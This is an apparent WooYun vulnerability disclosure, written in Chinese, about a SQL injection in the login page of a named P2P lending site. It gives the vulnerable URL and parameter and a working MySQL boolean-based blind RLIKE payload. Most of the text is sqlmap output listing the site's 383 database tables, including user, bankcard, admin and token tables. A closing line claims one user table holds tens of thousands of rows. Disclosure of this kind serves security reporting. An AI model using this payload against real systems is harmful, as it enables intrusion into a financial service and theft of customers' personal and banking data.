WooYun.org

https://www.sunfobank.com/logining.html?paramMap.password=admin&paramMap.code=135791&coverPassword=admin&paramMap.pageId=userlogin&[email protected]

主站SQL注入一枚导致大量信息泄露，383个表
Place: GET
Parameter: paramMap.email
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: paramMap.password=admin&paramMap.code=135791&coverPassword=admin&paramMap.pageId=userlogin&[email protected]') RLIKE (SELECT (CASE WHEN (8837=8837) THEN 0x61646d696e4061646d696e2e636f6d39393838 ELSE 0x28 END)) AND ('hyoF'='hyoF
---
web application technology: JSP
back-end DBMS: MySQL 5
Database: youyadai
[383 tables]
+-------------------------------------+
| app_token |
| bt_config |
| bt_rights |
| pool_rule |
| repayment_invest |
| smart_account |
| smart_interest_day |
| smart_interest_month |
| smart_interest_week |
| smart_interest_year |
| smart_invest |
| smart_pool |
| smart_repayment |
| smart_transfer_record |
| t_activity |
| t_ad_channel |
| t_admin |
| t_agreement |
| t_agreement_middle |
| t_amend |
| t_apply_paper_contract |
| t_apply_paper_contractlist |
| t_area_bank |
| t_automaticbid |
| t_automaticbid_log |
| t_award |
| t_back_recharge_cost |
| t_bankcard |
| t_bankcard_lists |
| t_banner |
| t_bidrecord |
| t_borrow |
| t_borrow_apply |
| t_borrow_apply_new |
| t_borrow_attr |
| t_borrow_paymentmode |
| t_borrow_status |
| t_borrow_success_list |
| t_borrow_way |
| t_brdetail |
| t_calendar_user |
| t_channel_user |
| t_closenetwork |
| t_collection |
| t_concern |
| t_contract |
| t_cost_manager |
| t_coupon |
| t_credit_invest |
| t_credit_invest_result |
| t_creditbrdetail |
| t_creditinfo |
| t_crediting |
| t_deskcalendar_attr |
| t_download |
| t_education_cost |
| t_event_record |
| t_exchange_code |
| t_excitation |
| t_freeze_detail |
| t_fund_messageboard |
| t_fundrecord |
| t_fundrecord_list |
| t_funds |
| t_group |
| t_group_user |
| t_guarantee_company |
| t_help_answer |
| t_help_question |
| t_help_type |
| t_info_count |
| t_inner_bid_strategy |
| t_integral_trade_money |
| t_intention_fund |
| t_invest |
| t_invest_history |
| t_links |
| t_loan_company |
| t_loans_detail |
| t_mail |
| t_mailset |
| t_market_relation |
| t_market_user_award |
| t_materialimagedetal |
| t_materialsauth |
| t_materialsauthtype |
| t_mediareport |
| t_mer_recharge_detail |
| t_mer_transfer_detail |
| t_mer_withdraw_detail |
| t_message |
| t_messageset |
| t_money |
| t_month_bill |
| t_month_profit_sms |
| t_month_recommend |
| t_msgboard |
| t_news |
| t_notice |
| t_notice_msg |
| t_noticecon |
| t_opinion |
| t_para_config |
| t_person |
| t_person_history |
| t_phone_binding_info |
| t_position |
| t_privileged_user |
| t_prize |
| t_prize_product |
| t_recharge |
| t_recharge_detail |
| t_recharge_info |
| t_recharge_withdraw_info |
| t_recommend_commission |
| t_recommend_detail |
| t_recommend_user |
| t_recommendlevel |
| t_recommendrule |
| t_referral_bonuses |
| t_region |
| t_relation |
| t_repay_detail |
| t_repayment |
| t_repayment_service |
| t_report |
| t_reporting |
| t_reporting_right |
| t_risk_detail |
| t_role |
| t_role_rights |
| t_select |
| t_sendsms |
| t_serviceman |
| t_show_record |
| t_sms |
| t_stock_account |
| t_stock_account_status |
| t_stock_fee |
| t_stock_person |
| t_stock_principal |
| t_stock_profit |
| t_stock_renewal |
| t_success_borrow_details |
| t_success_paying_all_details |
| t_success_paying_details |
| t_successstory |
| t_sysimages |
| t_team |
| t_third_info |
| t_third_user |
| t_tmp_parent_user |
| t_transfer |
| t_unfreeze_detail |
| t_user |
| t_user_check |
| t_user_finance |
| t_user_kefu |
| t_user_person_info |
| t_user_position |
| t_user_recommendrule |
| t_user_recorelist |
| t_user_relation |
| t_user_withdraw_info |
| t_usercard_lists |
| t_userintegraldetail |
| t_vipsum |
| t_withdraw |
| t_workauth |
| test_c3p0 |
| tx |
| user_invest_list_view |
| v_blacklist_list |
| v_integral_trade_user |
| v_inves_borrow_user_index |
| v_marketrelation_user |
| v_queryfundrecordlist |
| v_t_ad_channel |
| v_t_ad_channel_user |
| v_t_admin |
| v_t_agreement_middle_user |
| v_t_amount_record |
| v_t_apply_papar_contract_detail |
| v_t_apply_paper_contractlist |
| v_t_autobid_borrow |
| v_t_autobid_user |
| v_t_automaticbid_user_person |
| v_t_award_user_person |
| v_t_back_recharge_cost_user |
| v_t_backacmount |
| v_t_backacount |
| v_t_bacount_detail |
| v_t_bacount_history_detail |
| v_t_base_check |
| v_t_best_borrow |
| v_t_borrow_collection |
| v_t_borrow_concern |
| v_t_borrow_contract_user_info |
| v_t_borrow_detail |
| v_t_borrow_details |
| v_t_borrow_h |
| v_t_borrow_h_detail |
| v_t_borrow_h_firstaudit |
| v_t_borrow_h_firstaudit_detail |
| v_t_borrow_h_flowmark |
| v_t_borrow_h_flowmark_detail |
| v_t_borrow_h_fullscale |
| v_t_borrow_h_fullscale_detail |
| v_t_borrow_h_tenderin |
| v_t_borrow_h_tenderin_detail |
| v_t_borrow_home_index |
| v_t_borrow_index |
| v_t_borrow_index_copy |
| v_t_borrow_invest |
| v_t_borrow_invest_user |
| v_t_borrow_investrecord |
| v_t_borrow_investrecord_forinternet |
| v_t_borrow_list |
| v_t_borrow_list_for_360 |
| v_t_borrow_list_for_internet |
| v_t_borrow_msgbord |
| v_t_borrow_publish |
| v_t_borrow_repayment |
| v_t_borrow_statis |
| v_t_borrow_user_info |
| v_t_borrow_user_materialsauth |
| v_t_borrow_user_materialsauth_img |
| v_t_callcenter_help_list |
| v_t_channel_user |
| v_t_concern_funds |
| v_t_contract_user |
| v_t_coupon_activity |
| v_t_coupon_detail |
| v_t_credit_invest_detail |
| v_t_creditinfo_detail |
| v_t_creditinfo_index |
| v_t_crediting_apply |
| v_t_crediting_list |
| v_t_criditpicture |
| v_t_customers_list |
| v_t_deskcalendar_user |
| v_t_download_detail |
| v_t_download_list |
| v_t_empl_recommend_profit |
| v_t_exchange_code_coupon |
| v_t_fastpay_bankcard |
| v_t_forpayment_h |
| v_t_forpayment_h_interest |
| v_t_forpayment_h_total |
| v_t_frontshowpicture |
| v_t_fundmessageboard_user |
| v_t_fundrecord_user |
| v_t_funds_admin |
| v_t_funds_intention |
| v_t_group_admin |
| v_t_groupuser_user_person |
| v_t_hasrepay_h |
| v_t_intention_funds_user |
| v_t_intentionfund_user |
| v_t_invest_all |
| v_t_invest_all_week |
| v_t_invest_backacount |
| v_t_invest_backacount_sum |
| v_t_invest_borrow |
| v_t_invest_borrow_list |
| v_t_invest_borrow_query |
| v_t_invest_count |
| v_t_invest_for_credit |
| v_t_invest_forpay_detail |
| v_t_invest_haspay_detail |
| v_t_invest_interest_statis |
| v_t_invest_profit_all |
| v_t_invest_profit_detail |
| v_t_invest_profitrank_detail |
| v_t_invest_rank |
| v_t_invest_rank_detail |
| v_t_invest_rank_week |
| v_t_invest_recycled |
| v_t_invest_recycled_sum |
| v_t_invest_recycling |
| v_t_invest_recycling_sum |
| v_t_invest_statis |
| v_t_invest_statis_copy |
| v_t_invest_user_person |
| v_t_investment |
| v_t_laterepay_h |
| v_t_loans_detail_reconciliation |
| v_t_login_session_verify |
| v_t_login_statis |
| v_t_mail_admin |
| v_t_mail_notify |
| v_t_mail_user |
| v_t_mer_transfer_detailmoney |
| v_t_month_recommend_profit |
| v_t_news_list |
| v_t_newusercheck |
| v_t_next_repay |
| v_t_noshangchuan |
| v_t_overduepayment_h |
| v_t_pasttime |
| v_t_per_picture |
| v_t_person_authentication |
| v_t_personcheck |
| v_t_prize_product_user |
| v_t_prize_user |
| v_t_recommend_profit |
| v_t_recommend_user_invest |
| v_t_recommend_user_list |
| v_t_recommend_user_person |
| v_t_recommend_user_rule |
| v_t_recommend_ziliao_lias |
| v_t_recommendfriend_list |
| v_t_relation_level2 |
| v_t_relation_level3 |
| v_t_relation_level4 |
| v_t_relation_user |
| v_t_repay_detail |
| v_t_repayment_detail |
| v_t_repayment_h |
| v_t_rewardnewuser |
| v_t_risk_detail_h |
| v_t_risk_list_h |
| v_t_role_rights_menu |
| v_t_smart_invest_records |
| v_t_smart_transfer_list |
| v_t_tender |
| v_t_third_user_invest |
| v_t_third_user_invest_tmp |
| v_t_top_ad_borrow_list |
| v_t_transfer_user |
| v_t_user_adminchecklist |
| v_t_user_amountofrecords |
| v_t_user_backrw_lists |
| v_t_user_cash_lists |
| v_t_user_credit_apply_msgas |
| v_t_user_credit_msg |
| v_t_user_credit_msg_agin |
| v_t_user_creditlimit_apply |
| v_t_user_frends |
| v_t_user_frontmeg |
| v_t_user_frontpictur |
| v_t_user_fund_lists |
| v_t_user_fundrecord_lists |
| v_t_user_fundwithdraw_lists |
| v_t_user_invest |
| v_t_user_lock |
| v_t_user_loginsession_user |
| v_t_user_merwithdraw_lists |
| v_t_user_myborrowlist |
| v_t_user_myborrowrecorde |
| v_t_user_newuser |
| v_t_user_person |
| v_t_user_person_bankcard |
| v_t_user_person_service |
| v_t_user_picture |
| v_t_user_picture_base |
| v_t_user_picture_msg |
| v_t_user_picture_select |
| v_t_user_picture_select_2 |
| v_t_user_picture_select_3 |
| v_t_user_rechargedetails_list |
| v_t_user_rechargefirst_lists |
| v_t_user_relation |
| v_t_user_rescher |
| v_t_user_select_credit |
| v_t_user_select_credit_last |
| v_t_user_selectpicture |
| v_t_user_statis |
| v_t_user_stock_account |
| v_t_user_stock_fee |
| v_t_user_stock_primcipal |
| v_t_user_stock_profit |
| v_t_user_stock_renewal |
| v_t_user_successtotalbid_lists |
| v_t_user_transferdetails_list |
| v_t_user_verypictur |
| v_t_user_withdraw_lists |
| v_t_usercard_lists |
| v_t_usermanage_baseinfo |
| v_t_usermanage_baseinfoinner |
| v_t_usermanage_integralinfo |
| v_t_usermanage_integralinner |
| v_t_usermanage_viprecordinfo |
+-------------------------------------+
选取其中一个user表，数据达数万条